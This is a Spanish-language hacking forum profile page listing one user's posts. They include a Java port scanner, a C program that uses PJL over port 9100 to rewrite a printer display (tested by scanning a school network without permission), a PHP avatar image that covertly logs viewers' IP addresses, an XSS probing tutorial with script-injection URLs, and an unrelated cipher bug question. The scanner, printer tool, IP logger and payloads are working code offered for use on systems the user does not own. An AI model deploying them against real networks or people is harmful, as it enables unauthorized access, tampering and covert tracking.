elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Seguridad / [HOW TO] Crear escaner de puertas abiertas. en: 9 Julio 2014, 13:04 pm
Buenos días/noches, amigos. Hoy les voy a mostrar como, fácilmente, podemos crear una pequeña herramienta que permite de escanear las puertas abiertas de un IP.

El lenguaje en el que lo vamos a escribir nuestro programa/herramienta es JAVA: versátil, fácil y ligero.

Requisitos:
-Mínimo conocimiento de programación
-Plataforma de programación JAVA, ya sea: Eclipse, NetBeans, Notepad++, etc.
-Conocimiento lógico de una conexión.
-Ganas.

Código:

Scanner.java
Código:
package com.scanner;

import java.net.UnknownHostException;


public class Scanner {
public static void main (String[] args) {
try {
new Program();
} catch (UnknownHostException e) {
e.printStackTrace();
}
}
}


Program.java
Código:
package com.scanner;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.UnknownHostException;


public class Program {


private String IP;
private InetAddress inetAddress;
private Socket sock;
private BufferedReader input;

public Program() throws UnknownHostException {
input = new BufferedReader(new InputStreamReader(System.in));
System.out.println("IP: ");
try {
IP = input.readLine();
} catch(IOException ioex) {
System.out.println("Error: IOException - "+ioex);
}

inetAddress = InetAddress.getByName(IP);

for(int i=0; i<65535; i++) {
try {
sock = new Socket();
sock.connect(new InetSocketAddress(inetAddress, i), 2);
System.out.println("Conectado al IP: "+ IP + " - PUERTA: "+ i);
} catch (IOException ioex) {
}
}
}
}


Obviamente, si tienen un poquito de imaginación, pueden realizar un programa multi-threading que chequeé todos los IPs de los dispositivos conectados a la red local y de consecuencia escanear sus puertas abiertas.
Espero que les guste.
2  Seguridad Informática / Hacking / Hack Impresora en: 15 Mayo 2013, 20:28 pm
Hola muchachos, antes inizio diciendo que no hay muchas imagenes y puede que no sea claro, por eso intentare de explicar bien.
Hoy estaba en la escuela conectado a la red wireless, hice un nmap -T Insane -A 192.168.1.0/24, para ver los equipos que estaban conectados a la red y las puertas abiertas.

Bueno, me aparecio questa IP: 192.168.1.27 con il nombre (Lexmark.. bla bla bla), si es una impresora, con muchos ports abiertos y uno de estos era el 9100.

9100    TCP      PDL Data Stream

Buscando buscando y googleando y buscando mas, cai en una pagina donde ensenyaban el PJL (Pritner Job Language), con unos codigos. Estos codigos eran unos comandos que enviados a la impresora habrian hecho algo!
Pense pense y pense, y llegue a la conclusion y me dije:

"Mateo, tu sabes programar en C, haz un programa que te envie ese comando para hacer algo en la impresora no?"

Y me puse a trabajar, el comando que use fue el de cambiar lo que hay escrito en la impresora (en la pantallita).

Llegando a este resultado (Me disculpo por la resolucion pero la hice con el celular y no tenia que verme el profesor)



En italiano "PACCHISSIMO" que se pronuncia "PAKKISSIMO" es una cosa mal hecha o con resultados no buenos.

Ese es el texto ya modificado! A placer obviamente. Ahora les dejo el codigo de mi programita. Pruebenlo y diganme que tal!

Código
  1. //Daxgon
  2. #include <sys/types.h>
  3. #include <sys/socket.h>
  4. #include <netdb.h>
  5. #include <netinet/in.h>
  6. #include <stdio.h>
  7.  
  8. #define PORT 9100
  9.  
  10. int main (int argc, char *argv[]) {
  11.  
  12.  int sockfd,len,bytes_sent;
  13.  struct hostent *host;
  14.  struct sockaddr_in dest_addr;
  15.  char line[100];
  16.  
  17.  if (argc !=3) {
  18.    printf("\tIl messaggio non puo essere piu lungo di 16 caratteri\n");
  19.    exit(1);
  20.  }
  21.  
  22.  if ( (host=gethostbyname(argv[1])) == NULL) {
  23.    perror("La funzione gethostbyname ha prodotto un errore");
  24.    exit(1);
  25.  }
  26.  
  27.  printf ("Stampanti Hack By: Dax\n");
  28.  printf ("Hostname:   %s\n", argv[1]);
  29.  printf ("Messaggio: %s\n",argv[2]);
  30.  
  31.  dest_addr.sin_family= host->h_addrtype;  
  32.  dest_addr.sin_port= htons(PORT) ;
  33.  bcopy(host->h_addr, (char *) &dest_addr.sin_addr, host->h_length);
  34.  
  35.  bzero(&(dest_addr.sin_zero), 8);
  36.  
  37.  printf ("Socket....\n");
  38.  if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
  39.    perror("Errore con il socket");
  40.    exit(1);
  41.  }
  42.  
  43.  printf ("Connettendo....\n");
  44.  if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
  45.    perror("Errore durante la connessione");
  46.    exit(1);}
  47.  
  48.  //Questo è il codice della stampante
  49.  
  50.  strcpy(line,"\033%-12345X@PJL RDYMSG DISPLAY = \"");
  51.  strncat(line,argv[2],44);
  52.  strcat(line,"\"\r\n\033%-12345X\r\n");
  53.  
  54.  
  55.  printf ("Inviando dati...%d\n",strlen(line));
  56.  printf ("Linea: %s\n",line);
  57.  bytes_sent=send(sockfd,line,strlen(line),0);
  58.  
  59.  printf("Inviati %d bytes\n",bytes_sent);
  60.  close(sockfd);
  61. }
  62.  
Les prometo que entro sabado pondre muchas mas imagenes del nmap, asi entenderan mejor!

Si tienen dudas escribanme!

Big Up!

PS. Ahora estoy trabajando en un programa que me controla la impresora desde el computer. Pudiendo manejar todo lo que es posible. Quando este acabado y funcione lo dejare libre

Ah si, los codigos son estos por si no habian entendido.

Ec%-12345X@PJL RDYMSG DISPLAY="MESSAGE"
Ec%-12345X


Para compilar en Linux:

gcc -o nombredelarchivofinal nombredelarchivoenc.c

Y para ejecutar tenes que pasarle 2 argumentos. La IP local de la impresora y el mensaje ES:

./hackdisplay 192.168.1.27 "Este mensaje se vedra en la pantalla"
3  Programación / PHP / [SCRIPT]Conseguir IP en SMF con imagen en: 28 Octubre 2009, 12:57 pm
Hola amigos de ElHacker.net

Curiosiando, descubri esto...

Código
  1. <?php
  2. Header("Content-type: image/png");
  3. $im = ImageCreate(300, 300);
  4. $red = ImageColorAllocate($im, 255, 0, 0);
  5. $white = ImageColorAllocate($im, 255, 255, 255);
  6. $blue = ImageColorAllocate($im, 0, 0, 255);
  7. $black = ImageColorAllocate($im, 0, 0, 0);
  8. ImageFill($im, 0, 0, $red);
  9. ImageString($im, 10, 10, 10, "Hola elhacker.net", $black);
  10. $font_width = ImageFontWidth(10);
  11. $string_width = $font_width * (strlen("Hola! elhacker.net"));
  12. ImageLine($im, 100, 50, (100+$string_width), 50, $black);
  13. ImagePng($im);
  14. $nombre_archivo = 'logs.txt';
  15. if($_SERVER["HTTP_X_FORWARDED_FOR"]){
  16. $contenido = $_SERVER["HTTP_X_FORWARDED_FOR"]."<br/>";
  17. }else{
  18. $contenido = $_SERVER["REMOTE_ADDR"]."<br/>";
  19. }
  20.  
  21. if (is_writable($nombre_archivo)) {
  22.  
  23.    if (!$gestor = fopen($nombre_archivo, 'a')) {
  24.         echo "Error";
  25.         exit;
  26.    }
  27.  
  28.    if (fwrite($gestor, $contenido) === FALSE) {
  29.        echo "Error";
  30.        exit;
  31.    }
  32.  
  33.    echo "Exito";
  34.  
  35.    fclose($gestor);
  36.  
  37. } else {
  38.    echo "Error";
  39. }
  40. ?>

Lo guardamos con el nombre imagen.php puedes otro si quieres +
y obviamente creamos el log que se llame "logs.txt" que no contenga nada...
los subimos al servidor preferiblemente que sea de ustedes y editamos los permisos del archivo log a 777.
Ahora vamos al foro que sera por decirlo "victima" aunque no tiene nada que ver porque la IP no sirve... y vamos a Editar Perfil y elejis la opcion Subir por link, y ponemos
http://tu-nombre-web.com/imagen.php
si la haz guardado en otro directorio asegurate de ponerlo bien ;-)
Y ya esta hecho!, cada vez que hagas un post veras su IP, o cuando entren a tu perfil!

Saludos!!!!!!!!!!!!!!
4  Programación / PHP / [Duda] array mal hecho en: 25 Septiembre 2009, 17:37 pm
Bueno el codigo no funciona bien
EJ:
Escriban esto :WXYZABCDEFGHIJKLMNOPQRSTUV
les deberia salir: ABCDEFGHIJKLMNOPQRSTUVWXYZ
PEro no lo que imprime es: STUVSTUVABCDEFGHIJKLMNOPQR

Ayuda plz :D

Codigo
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<
html xmlns="http://www.w3.org/1999/xhtml">
<
head>
<
meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<
title>Ejemplo 2</title>
</
head>
<
body>
<
form action="formulario.php" method="POST">
Para descifrar: <input type="text" name="mensaje" />
<
input type="checkbox" name="opcion_4" />Desencriptacion 4 
</select>
<
br /><input type="submit" value="descifrar!" />
</
form>
<?
php
$decrypt_4 
$HTTP_POST_VARS["opcion_4"];
$mensaje_4 $HTTP_POST_VARS["mensaje"];
$rep = array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
$sol = array("W","X","Y","Z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","w","x","y","z","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v");
$conteo count($sol);
if (
$decrypt_4) {
for (
$i 0$i $conteo$i++){
$mensaje_4 str_replace($rep[$i],$sol[$i],$mensaje_4);
}
echo 
"<strong>Desencriptacion 4: </strong>"$mensaje_4"<br>";
}
?>
</body>
</html>
5  Seguridad Informática / Nivel Web / Jugando con XSS en: 17 Diciembre 2008, 02:10 am
Tonces...

HISTORIA:

Un poco de wiki:

Su nombre original "Cross Site Scripting", y renombrado XSS para que no sea confundido con las CSS, (hojas de estilo en cascada), originalmente abarcaba cualquier ataque que permitiera ejecutar código de "scripting", como VBScript o javascript, en el contexto de otro dominio.

Recientemente se acostumbra a llamar a los ataques de XSS "HTML Injection", sin embargo el término correcto es XSS. Estos errores se pueden encontrar en cualquier aplicación HTML, no se limita a sitios web, ya que puede haber aplicaciones locales vulnerables a XSS, o incluso el navegador web en sí. El problema está en que normalmente no se validan correctamente los datos de entrada que son usados en cierta aplicación. Esta vulnerabilidad puede estar presente de forma directa (también llamada persistente) o indirecta (también llamada reflejada). Cada una se trata de forma diferente.

    * Directa: este tipo de XSS es el que normalmente es censurado; así que es muy poco común que puedas usar tags como <script> o <iframe>

    * Indirecta: esta es un tipo de vulnerabilidad muy común y muy poco explotada. Consiste en modificar valores que la aplicación web utiliza para pasar variables entre dos páginas, sin usar sesiones.


Comenzando...

Bueno primero hay que dejar claro una cosa, este tutorial es para "fines positivos" y no negativos. Pues yo les recomiendo usar este tutorial para aprender más acerca de este tema, no quedarse en el mismo concepto si no ir probando muchas posibilidades y así aprender nuevos trucos :D.

Ok ya sabemos lo que es XSS (Cross site scripting) bueno, ahora sabiendo eso lo colocaremos a prueba con un simple ejemplo.

Ahh otra cosa no TODAS las páginas son vulnerables a este tipo de ataque como DragonJAR, Google y un montón más solo que no las colocare cada una, las páginas que usaré son obviamente vulnerables a XSS, PERO la "Injection HTML" no quedará guarda en la página principal si esta no es afectada.(No probado ;)), las que voy a usar serán usando el buscador de la WEB entonces podrán hacerse una idea de que cuando entre al buscador(Pagina principal) no se verá afectado por lo que ustedes hisieron.

I Capítulo | Identificando si una web es vulnerable:

1). Bueno digamos que tenemos cualquier página si tiene buscador (No el de Google Perzonalido) severo. bueno buscamos cualquier palabra que esten seguros no de ningún resultado EJ: MAAAAAAAAAAAAAAAAAAAAAAAAAAAAM, le damos buscar y verificamos la url. Depende de la página la url, aquí les daré algunos ejemplos para identificar a primera vista si es o no vulnerable:

http://www.paginavulnerable.com/search?=MAAAAAAAAAAAAAAAAAAAAAAAAAAAAM (SI!)
http://www.paginavulnerable.com/s?=MAAAAAAAAAAAAAAAAAAAAAAAAAAAAM (SI!)
http://www.paginavulnerable.com/buscador?keywords=MAAAAAAAAAAAAAAAAAAAAAAAAAAAAM (SI!)
http://www.paginavulnerable.com/?s=MAAAAAAAAAAAAAAAAAAAAAAAAAAAAM (SI!)
Bueno estos son los que mas conozco yo, si descubren otro no duden en ponerlo :D

2). Otro es verificando que en la página se muestre la palabra que buscaste EJ: La palabra "MAAAAAAAAAAAAAAAAAAAAAAAAAAAAM" no se encontro por favor revise la palbra e intentelo bla bla bla, pero nos fijamos en la url y es como así: /?s=MAAAAAAAAAAAAAAAAAAAAAAAAAAAAM&=0pk, o vainas así, no importa de todas maneras algunas web son vulnerables con ese tipo de url si en la pantalla se muestra el resultado de la búsqueda, Este tipo de WEB's son vulnerables aunque siempre hay excepciones. No se olviden de buscar el "MAAAAAAAAAAAAAAAAAAAAAAAAAAAAM" para verificar la URL.


3). Otra magnifica forma de comprobar si una web es vulnerable, es con la estiquetay este enunciado <script>alert(5);</script> con letras eh problado como 1000 veces y no sale no se porque. Bueno si la web es vulnerable se darán cuenta porque aparecera un letrero de alerta enunciando el número "5"en una URL sería así:

http://www.paginavulnerable.com/?s=<script>alert(5);</script>

En algunos casos (muy Debes en cuando) se tendrá que usar lo siguiente "> , con comillas y todo entonces la url de la página quedaría así:

http://www.paginavulnerable.com/?s="><script>alert(5);</script> Y pues aquí tendrá el mismo resultado:


Siguiente capítulo: Primer ataque.

Bueno señores decidí hacer este tutorial por capitulos cada capitulo equivale a un POST para que algunos no se confundan con algunas cosas... ahora mismo estoy trabajando en el II capítulo, esperenlo :D

/off
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines